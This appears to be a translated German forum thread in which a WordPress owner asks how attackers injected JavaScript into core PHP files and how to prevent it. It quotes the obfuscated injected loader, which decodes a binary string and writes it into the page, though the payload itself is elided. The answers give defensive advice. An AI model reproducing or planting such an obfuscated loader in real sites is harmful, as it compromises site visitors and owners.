Wie Angreifer schreiben Skript in meine PHP-Dateien?

Ich habe einen Blog mit WordPress erstellt, jetzt habe ich ein Problem. Angreifer schreiben Javascript-Codes in meine Dateien.

Nehmen wir an, ich habe Löcher in meinen Plugin-Skripten, aber wie können sie in PHP-Dateien schreiben?

Hier ist ein Teil der Liste der PHP-Dateien, in denen sie das Skript schreiben ( index.php, wp-activate.php, wp-comments-post.php, wp-settings.php ... )

und das ist das Javascript, in das sie schreiben

 kxjwm="225222 ... 2";madds=100;wljam=this;cjayr="i"+"te";geijt=116;fsmuj="wr"+cjayr;for(yadii in wljam){if(yadii.length==8 && yadii.charCodeAt(0)==madds && yadii.charCodeAt(7)==geijt){break;}}o="";bqcqp=0;qczew=wljam[yadii];dlhge=53;while (bqcqp<kxjwm.length){voxhw=0;for(evedn=0;evedn<8;evedn++){voxhw=voxhw<<1;if(kxjwm.charCodeAt(bqcqp+evedn)==dlhge){voxhw++;}}bqcqp=bqcqp+3;qczew[fsmuj](String.fromCharCode(voxhw));bqcqp=bqcqp+5;} 

Wie kann ich solche Angriffe verhindern?

Ich habe keine Erfahrung mit WordPress, also wird jede Hilfe sehr nett sein.

Vielen Dank

Solutions Collecting From Web of "Wie Angreifer schreiben Skript in meine PHP-Dateien?"

Hallo @Syom:

Oft erhalten Hacker Zugriff, weil Sie den Namen “admin” für Ihren Administrator verwenden und Sie ein leicht zu hackendes Passwort haben. Oder weil Sie Ihre Software nicht aktualisieren und einige der Sicherheitslücken nutzen, die gefunden und gepatcht wurden.

Im Folgenden finden Sie eine Reihe von Folien, die ausführlich erklären, wie Sie Ihre WordPress-Website schützen können, die am vergangenen Wochenende im WordCamp Phoenix vorgestellt wurde:

  • WordPress Endbenutzersicherheit

Hier sind einige Blogbeiträge von Otto zum Thema:

  • Wie finde ich eine Hintertür in einem gehackten WordPress?
  • Anatomie eines Themas Malware

Es gibt mehrere Möglichkeiten, die möglich sind:

  • kompromittierte FTP / SSH-Anmeldung;
  • kompromittierter WordPress Login;
  • errorshafte Server-Sicherheitskonfiguration;
  • kompromittierter Server;
  • eine Art Hintertür installiert;
  • etc.

Sie sollten sich sofort an den Hosting-Support wenden, dann hängt es von der Qualität und dem Preis Ihres Hosting ab, wie viel sie helfen werden.

Abgesehen davon, wenn Sie nicht in technische Fähigkeiten sicher sind, schlage ich vor, nach jemandem zu suchen, der sich mit der Aufräumung gehackter Blogs beschäftigt, sonst werden Sie sich über die Besonderheiten von Hack und Sicherheit in der Zukunft nicht sicher sein.